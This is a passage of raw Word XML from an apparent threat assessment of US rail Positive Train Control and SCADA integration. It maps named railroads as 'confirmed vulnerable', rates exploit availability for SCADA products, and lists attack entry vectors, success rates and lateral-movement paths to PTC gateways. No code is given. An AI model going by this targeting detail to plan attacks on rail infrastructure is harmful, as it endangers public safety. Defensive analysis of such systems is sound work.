                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[17]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Full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Nationwide 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41 railroads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FRA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hyperlink w:anchor="ref18">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[18]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Exploitation PoC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Research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Complete control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Responsible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hyperlink w:anchor="ref19">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[19]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Active Targeting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CARBIDE group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Reconnaissance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Intelligence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hyperlink w:anchor="ref20">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[20]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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7osyapblndte" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Attack Vector: SCADA-to-PTC Pivot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integration Architecture Flaws</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: | Component | Vulnerability | Access Path | Impact | Reference | |-----------|--------------|-------------|---------|-----------| | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HMI Workstations</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Windows XP/7 unpatched | RDP, SMB exploits | SCADA control | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref21">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[21]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OPC Servers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | No authentication | Direct memory access | Data manipulation | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[22]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocol Gateways</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Cleartext conversion | MITM attacks | Command injection | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[23]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Database Links</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | SQL injection | Backend access | Historical data | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[24]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Message Brokers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Default credentials | Queue manipulation | PTC commands | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[25]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">API Interfaces</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | No rate limiting | Brute force | Authentication bypass | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[26]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tmawkkrh987a" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Organizations Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_er4q8laa48dw" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive Victim Identification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This analysis maps organizations with confirmed PTC-SCADA integration vulnerabilities based on public filings, security assessments, and intelligence gathering </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[27]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hhidcjq1xnxv" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">High-Risk Integrated Systems (Confirmed Vulnerable)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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Integration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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Dispatch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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Route 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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Daily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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">BNSF Railway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Full SCADA-PTC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GE DispatchMax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32,500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8,000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hyperlink w:anchor="ref28">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[28]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Union Pacific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Centralized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Wabtec TMDS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32,000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7,800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hyperlink w:anchor="ref29">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[29]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CSX Transportation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Regional Centers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Movement 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21,000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1,200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hyperlink w:anchor="ref30">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[30]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Norfolk Southern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Unified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UTCS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19,500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1,100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hyperlink w:anchor="ref31">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[31]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Canadian National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Cross-border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RTC/PTC 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13,500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Cross-border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hyperlink w:anchor="ref32">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[32]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Amtrak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Multi-tenant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C3RS/ACSES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21,400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300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hyperlink w:anchor="ref33">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[33]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Kansas City Southern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Legacy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TCS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6,700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International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hyperlink w:anchor="ref34">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[34]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Metra Chicago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Urban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Venue CTC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495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700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hyperlink w:anchor="ref35">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[35]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dq1h8wcii26" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCADA System Vulnerability Profiles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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SCADA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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Known CVEs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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PTC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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploit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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">GE iFIX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5.9-6.5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47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Direct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Yes (Metasploit)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hyperlink w:anchor="ref36">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[36]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Wonderware InTouch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2014-2020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38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OPC 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Yes (Public)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hyperlink w:anchor="ref37">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[37]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Schneider ClearSCADA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31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Database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Yes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hyperlink w:anchor="ref38">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[38]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Siemens WinCC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V7.4-7.5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52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Protocol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Yes (Commercial)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hyperlink w:anchor="ref39">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[39]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ABB System 800xA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28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Message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PoC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hyperlink w:anchor="ref40">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[40]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t3tnmq48efhd" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical Infrastructure Dependencies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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Dependent 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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Rail Reliance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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SCADA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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cascade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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Annual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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Electric Power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400 coal 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Real-time dispatch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Grid instability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$12.4B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hyperlink w:anchor="ref41">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[41]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Chemical Industry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13,500 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Hazmat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Release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$8.7B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hyperlink w:anchor="ref42">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[42]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Water Treatment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3,300 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Chemical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Contamination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$2.3B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hyperlink w:anchor="ref43">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[43]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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Agriculture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7,000 terminals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Harvest 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Food shortage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$64.7B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hyperlink w:anchor="ref44">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[44]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Military Logistics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Strategic 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SDDC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Defense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Classified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hyperlink w:anchor="ref45">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[45]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ppr9ar7cqzs0" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Path Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ogx6hgh6a4rw" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Entry Point Distribution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on penetration testing and incident data </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref46">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[46]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Entry Vectors</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: | Vector | Frequency | Success Rate | Time to PTC | Difficulty | |--------|-----------|--------------|-------------|------------| | Internet-facing HMI | 34% | 78% | 4-6 hours | Low | | VPN compromise | 28% | 82% | 8-12 hours | Medium | | Phishing to SCADA | 23% | 67% | 12-24 hours | Low | | Supply chain | 15% | 94% | Pre-positioned | High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B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lateral Movement Patterns</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Corporate IT → Engineering workstation → SCADA HMI → PTC gateway (67%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
